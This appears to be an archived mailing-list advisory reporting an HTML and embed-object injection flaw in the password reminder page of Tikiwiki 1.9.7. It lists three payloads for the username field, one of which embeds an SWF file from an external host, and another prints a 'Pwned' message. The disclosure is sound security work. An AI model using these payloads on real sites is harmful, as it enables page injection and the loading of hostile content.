<<< Date Index >>>     <<< Thread Index >>>

Tikiwiki 1.9.7 HTML/embed object injection



Tikiwiki 
Version: 1.9.7 

Example Address 
http://example.com/tiki-remind_password.php

Overview:
The following codes can be added to the HTML password page by placing the HTML 
codes in the user name input box and hitting the "send me my password" button. 

Examples:
1.<br><br><b><u>XSS</u></b>
2.<EMBED SRC="http://site.com/xss.swf";
3.<html><fontcolor="Red"><b>Pwned</b></font></html>